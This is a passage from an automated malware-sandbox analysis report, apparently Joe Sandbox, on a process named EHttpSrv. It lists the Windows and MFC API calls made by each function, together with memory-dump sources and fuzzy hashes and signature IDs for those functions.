                                                                                                                • Instruction ID: ea582bc9380f3ed550f0ddff936b639677b4f6806d39c03b11275879b4d4be38
                                                                                                                • Opcode Fuzzy Hash: d9fe5cdd2b2663bd7e67fa88f134ce0ceda9424471f8b88cf63c91e175b127f5
                                                                                                                • Instruction Fuzzy Hash: 4A31CBF26007045BD3149F55CA82A1BBBE6EBE1614F50C83FE55AD7A50D63CF8468710
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042D850: #524.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D87F
                                                                                                                  • Part of subcall function 2042D850: #563.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D898
                                                                                                                  • Part of subcall function 20429FA0: #516.MFC80U(0000009A,00000000,00000038,FEEA6C22,?,00000000,20479F3C,000000FF,204263BE,?,?,000000B8,FEEA6C22,?,?,?), ref: 20429FD0
                                                                                                                  • Part of subcall function 2042A990: #516.MFC80U(00000098,00000000,00000038,FEEA6C22,?,00000000,20479EBD,000000FF,204263CF,?,?,?,000000B8,FEEA6C22,?), ref: 2042A9C0
                                                                                                                  • Part of subcall function 2042A990: #6735.MFC80U(20485878,2047EF1E,2047EECA,2047EE76,2047EE22), ref: 2042AA3D
                                                                                                                  • Part of subcall function 20427410: #516.MFC80U(00000099,00000000,00000038,FEEA6C22,?,00000000,?,2047B309,000000FF,204263E0,?,?,?,?,000000B8,FEEA6C22), ref: 20427442
                                                                                                                • #416.MFC80U(?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426431
                                                                                                                • #762.MFC80U(00000120,?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426474
                                                                                                                • #977.MFC80U(?), ref: 204264C2
                                                                                                                • #977.MFC80U(?,?), ref: 204264CA
                                                                                                                • #977.MFC80U(?,?,?), ref: 204264D8
                                                                                                                • #1555.MFC80U(00000010,00000010,000000FE,00000000,00000004,?,?,?), ref: 20426507
                                                                                                                • GetSysColor.USER32(00000005), ref: 2042650E
                                                                                                                • #1079.MFC80U(?,00000000), ref: 2042651C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #516#977$#1079#1555#416#524#563#6735#762Color
                                                                                                                • String ID:
                                                                                                                • API String ID: 982528815-0
                                                                                                                • Opcode ID: 5648d2ac7418de48b8c5000bd49b746fe147b288bb7b03ceb556e51628c86201
                                                                                                                • Instruction ID: 583975d9903fe4becb5d36a3077c42142cba33229de1660348c340dbb429fb34
                                                                                                                • Opcode Fuzzy Hash: 5648d2ac7418de48b8c5000bd49b746fe147b288bb7b03ceb556e51628c86201
                                                                                                                • Instruction Fuzzy Hash: BD516F70504B808FD321CF64D881BDBBBE4BF99748F408A1EF0DA97290D778A504CB66
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A055
                                                                                                                • #764.MFC80U(?), ref: 2044A0A2
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044A0AF
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A0EE
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000022,00000100,?), ref: 2044A11E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 2044A13B
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A16D
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044A194
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$#764ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 3041980425-0
                                                                                                                • Opcode ID: 03b9c78566b1dd80389c3f2b36833bf0a1bea24ae9f6d7108f501abc60001dba
                                                                                                                • Instruction ID: 82b977572f22e7b8bb91f181182a35f75dbe438bf220df568fdc3ecb4b1e28b1
                                                                                                                • Opcode Fuzzy Hash: 03b9c78566b1dd80389c3f2b36833bf0a1bea24ae9f6d7108f501abc60001dba
                                                                                                                • Instruction Fuzzy Hash: F651F3715187409FD750CFA8C888B9BBBF8BF89B05F40892EF599C7250E7B4A904CB52
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,00000000,?,20416D18,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 20418A37
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 4671958f0ad303c47a6cea02f2b3ca069dbd3f82c4566170932d8e23fa0049ef
                                                                                                                • Instruction ID: b5e178df7553e5923ded9b5b8ce6b07c4099fafa75c94dcfe441f56e0ece09ee
                                                                                                                • Opcode Fuzzy Hash: 4671958f0ad303c47a6cea02f2b3ca069dbd3f82c4566170932d8e23fa0049ef
                                                                                                                • Instruction Fuzzy Hash: 1431A2F16007089BC7249FA5CC81A2BF7E5EF90654B54C92EE15AC7E51EB3DF8858B10
                                                                                                                APIs
                                                                                                                • #1079.MFC80U(?,?,?,00000000,FEEA6C22), ref: 20455C4D
                                                                                                                  • Part of subcall function 20435260: #1079.MFC80U(?,FEEA6C22), ref: 2043529B
                                                                                                                  • Part of subcall function 20435260: #6749.MFC80U(?,?,FEEA6C22), ref: 204352A7
                                                                                                                • #1079.MFC80U(?,-00000001,?,?,00000000,FEEA6C22), ref: 20455C70
                                                                                                                  • Part of subcall function 20438C80: #1079.MFC80U(?,FEEA6C22), ref: 20438CBB
                                                                                                                  • Part of subcall function 20438C80: #6749.MFC80U(?,?,FEEA6C22), ref: 20438CC7
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 20455CF0
                                                                                                                • #1079.MFC80U(?,000000FF,?,?,?,00000000,FEEA6C22), ref: 20455D08
                                                                                                                • DestroyCursor.USER32(?), ref: 20455D21
                                                                                                                • #3873.MFC80U(00000003,?,?,00000000,00000000,00000000,00000000,?,?,00000000,FEEA6C22), ref: 20455D53
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000003,?,?,00000000,00000000,00000000,00000000), ref: 20455D71
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFF), ref: 20455DA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#6749$#3873#5862CursorDestroyExtractIconMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3740703228-0
                                                                                                                • Opcode ID: bc88314e8a2c7bb4b1c66cc2310b991db2a563fcf2a6d5de5453a8f766692c92
                                                                                                                • Instruction ID: ca98d3bb5e91f5b46d3c0e92cc0e6e070d20d5571afe716a276512f36404c08b
                                                                                                                • Opcode Fuzzy Hash: bc88314e8a2c7bb4b1c66cc2310b991db2a563fcf2a6d5de5453a8f766692c92
                                                                                                                • Instruction Fuzzy Hash: 1041BE72204700AFD220CFA8CC85FAA77F6ABD4B18F51C91CF6554B291DB78B9098B91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2311$#314#6063#6232#6751#777_time32
                                                                                                                • String ID:
                                                                                                                • API String ID: 2375346300-0
                                                                                                                • Opcode ID: 47ccfba3e1fb941079224ed5e546ca3a6837c2b87bdf42400c5254aeb6c8b629
                                                                                                                • Instruction ID: 047fd8ab0e14bad808cae18b8e573b341801a1b2de1a36cfe5e680196c8a5cba
                                                                                                                • Opcode Fuzzy Hash: 47ccfba3e1fb941079224ed5e546ca3a6837c2b87bdf42400c5254aeb6c8b629
                                                                                                                • Instruction Fuzzy Hash: 4941D5712082018BD714CF64CC85BAA7BA5BB94708F04C93DFD49AF6D5DB78A909CB92
                                                                                                                APIs
                                                                                                                • free.MSVCR80 ref: 2043C71E
                                                                                                                • malloc.MSVCR80 ref: 2043C74B
                                                                                                                • free.MSVCR80 ref: 2043C781
                                                                                                                • memcpy.MSVCR80(?,00000000,00000000,-00000023,?,00000000,?,2043F10A,?,?,?,?,?,00000001,00000000), ref: 2043C7AA
                                                                                                                • free.MSVCR80 ref: 2043C7B3
                                                                                                                • free.MSVCR80 ref: 2043C7C2
                                                                                                                • RegCloseKey.ADVAPI32(?,-00000023,?,00000000,?,2043F10A,?,?,?,?,?,00000001,00000000), ref: 2043C7D6
                                                                                                                • free.MSVCR80 ref: 2043C7DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free$Closemallocmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3581950131-0
                                                                                                                • Opcode ID: f0c7fdecfce2c502539653a6f82cc0022d8f8dea81b92cbdaf8e2dada8b9ab0a
                                                                                                                • Instruction ID: e8fc556353d8257b0342223d7edd590952b23e1f51f59bb0600cbce124897fe4
                                                                                                                • Opcode Fuzzy Hash: f0c7fdecfce2c502539653a6f82cc0022d8f8dea81b92cbdaf8e2dada8b9ab0a
                                                                                                                • Instruction Fuzzy Hash: CB318EB26006035BD6009FA49C85A67B7ACFF09621F149539ED05D3700EB2DFE98DBE2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#2366#4109#5609#5713ClientParentWindowmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311746519-0
                                                                                                                • Opcode ID: 713f1deccbfcd25f1fbb48848ab7b5f8e3d11472b31d5a077c9c2f4c7b21a063
                                                                                                                • Instruction ID: e0f211835fd23e83626e035faf1916a20849807f104068c9a12278701ed8cba4
                                                                                                                • Opcode Fuzzy Hash: 713f1deccbfcd25f1fbb48848ab7b5f8e3d11472b31d5a077c9c2f4c7b21a063
                                                                                                                • Instruction Fuzzy Hash: BE3129B06087019FC318CF58C884A6ABBF5BF98704F01CA6DE88A87361DB34E945CB55
                                                                                                                APIs
                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 2046C76E
                                                                                                                  • Part of subcall function 20431180: DestroyCursor.USER32(?), ref: 204311C1
                                                                                                                  • Part of subcall function 20431180: #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U ref: 20431250
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U ref: 2043125D
                                                                                                                  • Part of subcall function 20431180: #741.MFC80U ref: 2043126D
                                                                                                                  • Part of subcall function 20421E10: #658.MFC80U(FEEA6C22,?,?,00000000,2047A0D3,000000FF,2046C7A4), ref: 20421E58
                                                                                                                • #587.MFC80U ref: 2046C7AF
                                                                                                                • #587.MFC80U ref: 2046C7BF
                                                                                                                • #753.MFC80U ref: 2046C7CF
                                                                                                                • #753.MFC80U ref: 2046C7DF
                                                                                                                • #587.MFC80U ref: 2046C7EF
                                                                                                                  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
                                                                                                                  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
                                                                                                                  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
                                                                                                                  • Part of subcall function 20470490: #578.MFC80U(FEEA6C22,?,?,00000000,2047A279,000000FF,2046C814), ref: 204704D7
                                                                                                                  • Part of subcall function 20470490: #764.MFC80U(00000000,FEEA6C22,?,?,00000000,2047A279,000000FF,2046C814), ref: 204704E9
                                                                                                                • #651.MFC80U ref: 2046C81F
                                                                                                                • #605.MFC80U ref: 2046C82E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578#587$#745#753#764Destroy$#6003#605#651#658#722#741AcceleratorCursorTablefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2068799961-0
                                                                                                                • Opcode ID: 666a700826f119f38579f7ef2fcd8c9e43e6422b478b081f34851a4a66f0cb02
                                                                                                                • Instruction ID: 8433f1e96585c3a77f89288825cb40f808eff763fc34447904563ac6f3275bab
                                                                                                                • Opcode Fuzzy Hash: 666a700826f119f38579f7ef2fcd8c9e43e6422b478b081f34851a4a66f0cb02
                                                                                                                • Instruction Fuzzy Hash: 20212930008B818AD315DF74C895B9BBFE0AB75748F508D5CE0DA876A2DB78664CCBD2
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 2042FF4F
                                                                                                                • PtInRect.USER32(?,?,?), ref: 2042FF7D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2042FF90
                                                                                                                • GetParent.USER32(?), ref: 2042FF9A
                                                                                                                • #2366.MFC80U(00000000), ref: 2042FFA1
                                                                                                                • #6140.MFC80U(00000000,?,?,?,00000000,00000000), ref: 2042FFBB
                                                                                                                • #5829.MFC80U(00000000,?,?,?,00000000,00000000), ref: 2042FFC9
                                                                                                                • #1894.MFC80U ref: 2042FFD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#1894#2366#5829#6140ClientParentWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 212747824-0
                                                                                                                • Opcode ID: 6937a4f93c5ea9244e49995fcdc09199884f663bc647000cf4e6ccc2ac0629fa
                                                                                                                • Instruction ID: 2bf1152b81ae0c4fa8cd025b0b9b50b58acb653149e68ad9b126918eb8fed9ab
                                                                                                                • Opcode Fuzzy Hash: 6937a4f93c5ea9244e49995fcdc09199884f663bc647000cf4e6ccc2ac0629fa
                                                                                                                • Instruction Fuzzy Hash: 031130712147059FC314DF64CC85FABB7E8FB84619F008A1DF59686690DB78E844CB91
                                                                                                                APIs
                                                                                                                • #310.MFC80U(?,FEEA6C22,?,6FB1281E,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9D1
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9DF
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9ED
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9FD
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA0D
                                                                                                                • #4026.MFC80U(0000027C,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA1F
                                                                                                                • #4026.MFC80U(0000027D,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA2C
                                                                                                                • #4026.MFC80U(0000027E,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA39
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$#4026
                                                                                                                • String ID:
                                                                                                                • API String ID: 3538715513-0
                                                                                                                • Opcode ID: 9beabf18ad02b9e4f8aeca6623d471602ee941e52d0de1d67d13c8cec5c15a8b
                                                                                                                • Instruction ID: ae243086d011bdde0d300e658b7e24c8606357b06fdfa419f5f8277fe1726ebc
                                                                                                                • Opcode Fuzzy Hash: 9beabf18ad02b9e4f8aeca6623d471602ee941e52d0de1d67d13c8cec5c15a8b
                                                                                                                • Instruction Fuzzy Hash: 4A216375208B409FC310DF15CC8875ABBE5EB85719F008A2DF85283790DB79950DCF52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042F8C0: #1946.MFC80U(FEEA6C22,?,?,?,2047AF4A,000000FF,2042756F,?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042F90A
                                                                                                                  • Part of subcall function 2042F8C0: #578.MFC80U(FEEA6C22,?,?,?,2047AF4A,000000FF,2042756F,?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042F917
                                                                                                                  • Part of subcall function 2042F8C0: #587.MFC80U(?,?,2047B269,000000FF,204268BF,?), ref: 2042F927
                                                                                                                • #657.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042757A
                                                                                                                • #657.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042758A
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042759A
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275AA
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275BA
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275CA
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275DA
                                                                                                                • #718.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #587$#657$#1946#578#718
                                                                                                                • String ID:
                                                                                                                • API String ID: 4135078562-0
                                                                                                                • Opcode ID: c9782c9832fcb8682713ef34a66ba18d4b6aa73f104265ab85aa5047acdd4a07
                                                                                                                • Instruction ID: d92657625d66678ccc7935c96932225f3c66df0d070de15a78006974df052bd7
                                                                                                                • Opcode Fuzzy Hash: c9782c9832fcb8682713ef34a66ba18d4b6aa73f104265ab85aa5047acdd4a07
                                                                                                                • Instruction Fuzzy Hash: 15114F30008B818BD315DF64C8557EABBE5BF60718F40CE5DE0A6476A1DB78A60CC792
                                                                                                                APIs
                                                                                                                • DestroyCursor.USER32(?), ref: 2042AADE
                                                                                                                • #578.MFC80U(FEEA6C22,?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AAEF
                                                                                                                • #741.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB00
                                                                                                                • #657.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB10
                                                                                                                • #587.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB20
                                                                                                                • #587.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB30
                                                                                                                • #587.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB40
                                                                                                                • #718.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
